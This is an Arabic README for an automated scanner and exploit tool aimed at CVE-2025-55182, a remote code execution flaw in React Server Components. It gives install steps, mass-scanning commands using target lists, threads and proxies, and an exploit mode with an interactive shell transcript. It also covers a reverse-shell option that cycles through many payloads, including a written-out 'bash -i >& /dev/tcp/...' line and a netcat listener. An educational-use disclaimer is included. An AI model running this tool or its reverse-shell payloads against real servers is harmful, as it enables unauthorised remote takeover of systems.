
ماسح ضعف RCE حرج لمكونات خادم React (CVE-2025-55182). إطار استغلال آلي مع دعم متعدد للحمولات، وقدرات الوكيل، وتنفيذ أوامر تفاعلي.
[!Warning] هذا المستودع مخصص لأغراض تعليمية وبحثية فقط.
- استخدم أدوات الإثبات المقدمة حصريًا على أنظمتك أو التي لديك إذن صريح لاختبارها.
- الوصول غير المصرح به أو الاستغلال أو سوء استخدام أي مادة في هذا المستودع غير قانوني.
- المؤلف (المؤلفون) لا يتحملون أي مسؤولية عن أي أضرار أو سوء استخدام أو عواقب قانونية ناتجة عن الاستخدام غير الصحيح.
CVE-2025-55182 هي ثغرة حرجة لتنفيذ التعليمات البرمجية عن بُعد تؤثر على إصدارات React Server Components 19.0.0 و19.1.0 و19.1.1 و19.2.0. تنبع هذه الثغرة من إلغاء التسلسل غير الآمن لحمولات طلبات HTTP إلى نقاط نهاية وظائف الخادم، مما يسمح للمهاجمين غير الموثوقين بتنفيذ تعليمات برمجية عشوائية عن بُعد.
معرف CVE: CVE-2025-55182
الإصدارات المتأثرة:
git clone https://github.com/AliHzSec/CVE-2025-55182.git
cd CVE-2025-55182
python3 -m venv .venv
source .venv/bin/activate
pip install -r requirements.txt
python3 main.py [-h] (-d | -e) [-u URL] [-l LIST] [-p PROXY | -pl PROXY_LIST] [-t THREADS] [-s]
| الوسيطة | الوصف |
|---|---|
-d, --detection | تشغيل في وضع الكشف (مسح الثغرات) |
-e, --exploit | تشغيل في وضع الاستغلال (استغلال هدف واحد) |
-u, --url URL | عنوان URL لهدف واحد للمسح/الاستغلال |
-l, --list FILE | ملف يحتوي على قائمة عناوين URL الأهداف (وضع الكشف فقط) |
-p, --proxy URL | عنوان URL وكيل واحد (مثال: http://127.0.0.1:8080) |
-pl, --proxy-list FILE | ملف يحتوي على قائمة عناوين URL للوكلاء (واحد لكل سطر) |
-t, --threads N | عدد الخيوط المتزامنة (الافتراضي: 10، وضع الكشف فقط) |
-s, --silent | الوضع الصامت - عرض الأهداف الضعيفة فقط (وضع الكشف فقط) |
-o, --output [FILE] | حفظ الأهداف الضعيفة في ملف (وضع الكشف فقط). إذا لم يتم تقديم اسم ملف، يستخدم الافتراضي: CVE-2025-55182_Result_YYYYMMDD_HHMMSS.txt |
--debug | تمكين تسجيل التصحيح - عرض تفاصيل الاستجابة ومحاولات إعادة المحاولة (غير متاح في الوضع الصامت) |
python3 main.py -d -u https://example.com
python3 main.py -d -l targets.txt
python3 main.py -d -l targets.txt -p http://127.0.0.1:8080
python3 main.py -d -l targets.txt -s
python3 main.py -d -l targets.txt -t 20
python3 main.py -e -u https://vulnerable-site.com
ثم اختر [i] للشل التفاعلي:
Choose exploitation method:
[i] Interactive shell
[r] Reverse shell
Enter your choice (i/r): i
shell> whoami
ec2-user
shell> id
uid=1000(ec2-user) gid=1000(ec2-user) groups=1000(ec2-user)
shell> ls -la
total 48
drwxrwxr-x 5 user user 4096 Dec 7 10:00 .
drwxr-xr-x 3 root root 4096 Dec 1 08:00 ...
...
shell> exit
python3 main.py -e -u https://vulnerable-site.com
ثم اختر [r] للشل العكسي واختر نوع الحمولة:
Choose exploitation method:
[i] Interactive shell
[r] Reverse shell
Enter your choice (i/r): r
Choose payload option:
[d] Use default payloads (Try multiple reverse shells)
[c] Provide custom payload
Enter your choice (d/c): d
Enter your IP and port in this format:
Example: 192.168.1.100:4444
IP:PORT> 192.168.1.100:4444
Setup your listener with this command:
nc -lvnp 4444
Press ENTER when your listener is ready...
ستحاول الأداة تلقائيًا أكثر من 17 حمولة شل عكسي مختلفة حتى تنجح إحداها.
Enter your choice (d/c): c
Enter your custom reverse shell payload:
payload> bash -i >& /dev/tcp/10.0.0.1/4444 0>&1